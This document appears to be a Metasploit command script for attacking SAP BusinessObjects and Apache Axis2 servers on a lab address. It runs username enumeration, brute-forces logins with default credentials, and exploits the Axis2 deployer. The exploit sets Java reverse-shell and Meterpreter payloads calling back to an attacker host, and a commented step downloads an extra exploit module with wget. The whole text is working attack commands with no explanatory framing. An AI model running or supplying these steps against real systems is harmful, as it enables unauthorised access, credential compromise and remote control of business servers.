echo "administrator" >> /tmp/users.txt echo "foo" >> /tmp/users.txt echo "bar" >> /tmp/users.txt echo "admin" >> /tmp/users.txt ################################### # Version Detection (dswsbobje) ################################### use scanner/http/sap_businessobjects_version_enum set RHOSTS 192.168.33.128 run ######################################################################################### # Username Enumeration (dswsbobje) # NOTE: # dswsbobje is only the interface used to identify valid credentials for CmcApp. # Credentials will work only for CmcApp not for dswsbobje. ######################################################################################### use scanner/http/sap_businessobjects_user_enum set RHOSTS 192.168.33.128 set USERNAME administrator run use scanner/http/sap_businessobjects_user_enum set RHOSTS 192.168.33.128 set USER_FILE /tmp/users.txt run ######################################################################################### # Username Bruteforce # NOTE: # dswsbobje is only the interface used to verify valid credentials for CmcApp. # Credentials will work only for CmcApp not for dswsbobje. ######################################################################################### use scanner/http/sap_businessobjects_user_brute set RHOSTS 192.168.33.128 set USERNAME administrator set PASSWORD '' run ######################################## # Username Bruteforce (Web) - CmcApp ######################################## use scanner/http/sap_businessobjects_user_brute_web set RHOSTS 192.168.33.128 set USERNAME administrator set PASSWORD '' run ######################################################################## # SAP BusinessObjects Username Bruteforce - Axis2 interface (dswsbobje) ######################################################################## use auxiliary/scanner/http/axis_login set URI /dswsbobje/axis2-admin/login set USERNAME admin set PASSWORD axis2 set RHOSTS 192.168.33.128 run ######################################################################## # SAP BusinessObjects Exploit - Axis2 interface (dswsbobje) ######################################################################## # windows shell use exploit/multi/http/axis2_deployer set PATH /dswsbobje set RHOST 192.168.33.128 set payload java/shell/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j # meterpreter shell use exploit/multi/http/axis2_deployer set PATH /dswsbobje set RHOST 192.168.33.128 set payload java/meterpreter/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j ######################################################## # non-SAP Username Bruteforce - Default Axis2 interface ######################################################## use auxiliary/scanner/http/axis_login set URI /dswsbobje/axis2-admin/login set USERNAME admin set PASSWORD axis2 set RHOSTS 192.168.33.128 run ############################################ # non-SAP exploit / Default Axis2 interface ############################################ use exploit/multi/http/axis2_deployer set PATH /axis2 set RHOST 192.168.33.128 set payload java/shell/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j ############################################################################# # non-SAP exploit / Default Axis2 interface (via REST) # # NOTE: SAP BusinessObjects has REST disabled so this will only work against Axis2 # ############################################################################# # # cd /opt/metasploit3/msf3/modules/exploits/multi/http # wget http://spl0it.org/files/patches/metasploit/axis2_deployer_rest.rb # ############################################################################# use exploit/multi/http/axis2_deployer_rest set PATH /axis2 set RHOST 192.168.33.128 set payload java/shell/reverse_tcp set target 0 set LHOST 192.168.33.1 set LPORT 13337 exploit -j